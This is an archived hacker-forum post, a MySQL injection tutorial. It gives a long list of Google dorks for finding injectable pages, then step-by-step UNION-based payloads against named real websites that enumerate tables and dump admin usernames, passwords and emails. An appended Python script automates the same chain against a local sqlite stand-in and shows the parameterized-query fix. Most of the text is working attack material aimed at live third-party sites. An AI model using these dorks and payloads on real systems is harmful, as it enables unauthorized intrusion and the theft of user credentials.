Topic: MYSQL INJECTION
D4rk357
ICW Team Member
Jr. Member
*****

Karma: +2/-0
Offline Offline

Posts: 62



WWW
« on: February 03, 2010, 10:12:22 PM »

1. USE DORKS TO FIND SITES
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?id=
inurl:play_old.php?id=
inurl:newsitem.php?id=
inurl:readnews.php?id=
inurl:top10.php?id=
inurl:historialeer.php?id=
inurl:reagir.php?id=
inurl:Stray-Questions-View.php?id=
inurl:forum_bds.php?id=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?id=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?id=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:top10.php?cat=
inurl:viewapp.php?id=
inurl:galeri_info.php?id=
inurl:iniziativa.php?id=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:article.php?ID=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:avd_start.php?avd=
inurl:detail.php?ID=
inurl:index.php?=
inurl:product_ranges_view.php?ID=
inurl:material.php?id=
inurl:galeri_info.php?l=
inurl:iniziativa.php?in=
inurl:look.php?ID=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

2. CHECK WHETHER THE SITE IS VULNERABLE

Put a ' in front of the page.

If it does not reload in its original format, it is vulnerable.

eg.

Nothing is shown on the page, so it is possible that it is vulnerable.

P.S.:
If you get an error like this, it is not MySQL injection, it's MSSQL:


/ Microsoft Access ODBC driver /

/ Open quotation /

/ Microsoft Amos DB provider for Oracle /

/ Division by zero in /

So find a good MSSQL tutorial.

3. FINDING THE NUMBER OF COLUMNS IN THE SQL DATABASE
Quote
http://www.pseb.org.pk/page.php?nid=11 ORDER BY 1-- NO ERROR

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 10--  ERROR

SO THE COLUMN NUMBER IS BETWEEN 1 AND 10

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 5--  ERROR
SO THE COLUMN NUMBER IS BETWEEN 1 AND 5

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 4-- NO ERROR
SO THE NUMBER OF COLUMNS IN THE DATABASE IS 4

4. CHECK IF THE UNION STATEMENT IS WORKING AND FIND VULNERABLE COLUMNS

Quote
http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT 1,2,3,4--
Watch out for the minus I placed before the web page number.
We do it so the website only returns the header and we can see useful information.
See the numbers it is showing on the page.
Those are the injectable column numbers.

5. CHECK DATABASE VERSION


http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT @@version,2,3,4--

VERSION 5.0.83, cheers

6. FINDING TABLE NAMES


This sub-section is divided into two parts:

6A: WHEN ALL TABLE NAMES ARE SHOWN AT ONCE
Quote
http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--
In this case we will see which tables are interesting.
tblUsers intrigues me in this case :hehe:

6B: WHEN ONLY ONE TABLE NAME IS SHOWN, AND THAT IS SOMETHING LIKE CHARACTER_SETS
Here we use LIMIT statements.
Example:
Check this:


http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union select all table_name from information_schema.tables--


You will get the same problem here which I mentioned above.

So your way forward will be:

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 0,1--


then

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 1,1--

then

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 2,1--

till

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select table_name from information_schema.tables limit 17,1--

Use the magic quotes trick to find column names along with LIMIT.

7. FINDING COLUMNS IN THE DATABASE

This sub-section has been divided into 2 parts:

7A. FINDING COLUMNS IN A PARTICULAR TABLE

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select column_name from information_schema.columns where table_name='adminusers' limit 0,1--
Here only one column name is displayed, so I am using the LIMIT statement; otherwise it would be unnecessary.
It only works if MAGIC QUOTES is off.
The single quotes I placed around the table name are important.
If it doesn't work, try hexing the table name.
Google to find a hex converter, put the table name in there and get its hex.

7B. FINDING ALL COLUMN NAMES

Quote
http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT COLUMN_NAME,2,3,4 from information_schema.COLUMNS--

If only one column name is displayed, then use the LIMIT statement as shown above.

8. DISPLAYING USER NAMES AND PASSWORDS

0x3a is the hex form of ":".

http://www.medicalmarijuanainformation.com/therapeuticuses/patientGroups.php?groupID=-13 union all select group_concat(adminID,0x3a,adminUsername,0x3a,adminPassword) from adminusers --
Quote
http://www.pseb.org.pk/page.php?nid=-11 union all select concat(user_id,0x3a,password,0x3a,email),2,3,4 from tblUsers --

Cracking the hash, finding the hash type, finding the admin page etc. are out of the scope of this tutorial.

I will make another tutorial for it soon.



Andhra Hackers , Indian Hackers , Indian Cyber Warriors , Ethical Hackers Forum
|-|!/\/\@|<@/?
« Reply #1 on: February 08, 2010, 01:08:21 PM »

Nice tutorial bro.

But I have a small doubt: what's the difference between MySQL injection and SQL injection, as both are using the same commands?
D4rk357
ICW Team Member
« Reply #2 on: February 09, 2010, 01:03:24 AM »

Quote from: |-|!/\/\@|<@/?
Nice tutorial bro.

But I have a small doubt: what's the difference between MySQL injection and SQL injection, as both are using the same commands?

Nice question.

Firstly, you are incorrect to say that MySQL and other SQL commands are the same.

Commands change according to the SQL dialect.

Commands for MSSQL are different from MySQL.

Also, commands for MySQL version < 5 change a bit, and you have to brute force to get table and column names as there is no information_schema.
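The procedure from the first post (the ' probe, ORDER BY, the negative-id UNION, LIMIT k,1 enumeration and group_concat) together with the point in Reply #2 about MySQL older than 5.0, worked through in one runnable Python script. This is an added example, not code from the post or from the sites it names. An in-memory sqlite3 database stands in for the MySQL server, so sqlite_master replaces information_schema.tables, char(58) replaces the 0x3a separator, and || replaces concat(); everything else in the payloads is the same SQL the post types into the URL. The pages table, its four columns, the fact that only title and body are rendered, and the two sample credential rows are assumptions made for this example; tblUsers, user_id, password and email are the names the post shows. One caveat the post glosses over: ORDER BY n measures the number of columns in the SELECT being injected into, not the number of columns in the database, and the UNION must match exactly that count or the server reports an error, which is what the binary search and the marker probe rely on. safe_page() is the one-line fix, a bound parameter, under which every payload in the script simply matches no row.

```python
import re
import sqlite3

# Constructed stand-in for the site the post targets: an in-memory sqlite3
# database, not MySQL. tblUsers/user_id/password/email come from the post; the
# pages table and the two sample rows (md5 of "password" and "123456") do not.
_SCHEMA = """
CREATE TABLE pages (nid INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO pages VALUES (11, 'About PSEB', 'Board profile page', 'webmaster');
CREATE TABLE tblUsers (user_id INTEGER, password TEXT, email TEXT);
INSERT INTO tblUsers VALUES (1, '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.com');
INSERT INTO tblUsers VALUES (2, 'e10adc3949ba59abbe56e057f20f883e', 'editor@example.com');
"""

def _db():
    con = sqlite3.connect(":memory:")
    con.executescript(_SCHEMA)
    return con

def _render(row):
    # Only title (column 2) and body (column 3) reach the HTML, which is why
    # the UNION markers 2 and 3 are the ones that turn out to be "injectable".
    return f"<h1>{row[1]}</h1><p>{row[2]}</p>"

def vulnerable_page(nid):
    """page.php?nid=... as the post assumes it is written: the raw parameter is
    pasted into the SQL text, so every payload in the tutorial goes through."""
    try:
        row = _db().execute(
            f"SELECT nid, title, body, author FROM pages WHERE nid = {nid}"
        ).fetchone()
    except sqlite3.Error as exc:
        return f"Warning: {exc}"  # the error page the ' probe is looking for
    return _render(row) if row else ""  # blank page when nothing matches

def safe_page(nid):
    """The fix: a bound parameter is data, never SQL; payloads match no row."""
    sql = "SELECT nid, title, body, author FROM pages WHERE nid = ?"
    row = _db().execute(sql, (nid,)).fetchone()
    return _render(row) if row else ""

def is_error(page):
    return page.startswith("Warning:")

def _h1(page):
    m = re.search(r"<h1>(.*?)</h1>", page)
    return m.group(1) if m else None

def find_column_count(base="11", hi=10):
    """Step 3 as a binary search on ORDER BY n. It counts the columns of the
    SELECT being injected into, not "columns in the database"."""
    lo = 1  # ORDER BY 1 never fails on a query that returns a row
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if is_error(vulnerable_page(f"{base} ORDER BY {mid}--")):
            hi = mid - 1
        else:
            lo = mid
    return lo

def find_reflected_columns(ncols, base="-11"):
    """Step 4: a negative id so only the UNION row renders; the numeric markers
    that survive into the HTML are the columns that can carry data out."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    page = vulnerable_page(f"{base} UNION ALL SELECT {markers}--")
    return [int(m) for m in re.findall(r">(\d+)<", page)]

def enumerate_tables(col=2, ncols=4, base="-11"):
    """Step 6B: one name per request with LIMIT k,1 (sqlite_master plays
    information_schema.tables) until the page comes back blank."""
    sel = ",".join("name" if i == col else str(i) for i in range(1, ncols + 1))
    names, k = [], 0
    while True:
        page = vulnerable_page(f"{base} UNION ALL SELECT {sel} FROM sqlite_master "
                               f"WHERE type='table' LIMIT {k},1--")
        if _h1(page) is None:
            return names
        names.append(_h1(page))
        k += 1

def guess_tables(wordlist, ncols=4, base="-11"):
    """Reply #2's case, MySQL older than 5.0 with no information_schema: a
    table exists if selecting FROM it does not come back as an error."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    return [name for name in wordlist
            if not is_error(vulnerable_page(f"{base} UNION ALL SELECT {markers} FROM {name}--"))]

def dump_users(col=2, ncols=4, base="-11"):
    """Step 8: group_concat packs every credential row into the one reflected
    column; char(58) is the ':' separator the post writes as 0x3a."""
    sel = ",".join("group_concat(user_id || char(58) || password || char(58) || email)"
                   if i == col else str(i) for i in range(1, ncols + 1))
    page = vulnerable_page(f"{base} UNION ALL SELECT {sel} FROM tblUsers--")
    return _h1(page).split(",") if _h1(page) else []

if __name__ == "__main__":
    n = find_column_count()
    print("columns:", n, "reflected:", find_reflected_columns(n))
    print("tables:", enumerate_tables(ncols=n), guess_tables(["users", "admin", "tblUsers"]))
    print("dump:", dump_users(ncols=n))
    print("safe:", repr(safe_page("-11 UNION ALL SELECT 1,2,3,4--")))
```

Run it as a script, or import it and call find_column_count(), find_reflected_columns(4), enumerate_tables(), guess_tables([...]) and dump_users() in that order to follow the post step by step; each call issues against the local database the same kind of request the post types into the browser. The only thing that separates vulnerable_page() from safe_page() is whether the parameter is pasted into the SQL text or bound as a value, which is the whole of the fix for this class of bug.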